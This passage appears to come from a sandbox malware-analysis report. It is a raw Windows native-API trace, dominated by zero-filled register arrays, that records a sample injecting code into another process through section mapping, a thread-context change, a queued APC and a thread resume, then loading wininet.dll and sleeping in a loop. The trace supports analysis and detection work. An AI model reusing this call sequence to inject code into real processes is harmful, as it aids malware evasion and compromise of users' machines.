[364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0276.318] NtCreateSection (in: SectionHandle=0x25d680, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x25d620, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x25d680*=0x118) returned 0x0 [0276.322] NtMapViewOfSection (in: SectionHandle=0x118, ProcessHandle=0x114, BaseAddress=0x25d688*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x25d628*=0x10b646, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x25d688*=0x7120000, SectionOffset=0x0, ViewSize=0x25d628*=0x10c000) returned 0x0 [0276.332] NtMapViewOfSection (in: SectionHandle=0x118, ProcessHandle=0xffffffffffffffff, BaseAddress=0x25d678*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x25d628*=0x10c000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x25d678*=0x1f20000, SectionOffset=0x0, ViewSize=0x25d628*=0x10c000) returned 0x0 [0276.369] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x1f20000) returned 0x0 [0276.404] NtClose (Handle=0x118) returned 0x0 [0276.408] NtSetContextThread (ThreadHandle=0x110, Context=0x25dbf0*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x46, [73]=0xf6, [74]=0x61, [75]=0x7, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x28f1f0, SegGs=0x0, SegFs=0x2514900, SegEs=0x0, SegDs=0x28f588, Edi=0x0, Esi=0x100ec, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x28f418, SegCs=0x0, EFlags=0x28f3f0, Esp=0x0, SegSs=0x16, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x80, [5]=0xf4, [6]=0x28, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x4, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xe5, [45]=0x68, [46]=0x1a, [47]=0x7, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0276.409] NtQueueApcThread (ThreadHandle=0x110, ApcRoutine=0x71a68f2, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0276.413] NtResumeThread (in: ThreadHandle=0x110, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0276.413] NtClose (Handle=0x114) returned 0x0 [0276.414] NtClose (Handle=0x110) returned 0x0 [0276.421] PostThreadMessageW (idThread=0x454, Msg=0x111, wParam=0x0, lParam=0x0) returned 0 [0276.542] PostThreadMessageW (idThread=0x454, Msg=0x8003, wParam=0x25e157, lParam=0x0) returned 0 [0276.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x25eb24*=0x200000, RegionSize=0x25eb28, FreeType=0x8000) returned 0x0 [0276.543] NtDelayExecution (Alertable=0, Interval=0x25e4f4*=-50000000) returned 0x0 [0281.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x25e4e4*=0x0, ZeroBits=0x0, RegionSize=0x25e4e8*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x25e4e4*=0x200000, RegionSize=0x25e4e8*=0x10000) returned 0x0 [0281.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x200000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x200000, ResultLength=0x0) returned 0x0 [0281.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x25eb24*=0x200000, RegionSize=0x25eb28, FreeType=0x8000) returned 0x0 [0281.591] NtDelayExecution (Alertable=0, Interval=0x25e4f4*=-50000000) Thread: id = 110 os_tid = 0x354 Thread: id = 111 os_tid = 0x34c [0271.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x209fe70*=0x0, ZeroBits=0x0, RegionSize=0x209fe74*=0x2cc50, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x209fe70*=0x5a0000, RegionSize=0x209fe74*=0x2d000) returned 0x0 [0271.267] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="wininet.dll", BaseAddress=0x209fe5c | out: BaseAddress=0x209fe5c*=0x77310000) returned 0x0 [0271.430] Sleep (dwMilliseconds=0x7d0) [0273.438] Sleep (dwMilliseconds=0x7d0) [0275.450] Sleep (dwMilliseconds=0x7d0) [0277.495] Sleep (dwMilliseconds=0x7d0) [0279.508] Sleep (dwMilliseconds=0x7d0) [0281.519] Sleep (dwMilliseconds=0x7d0)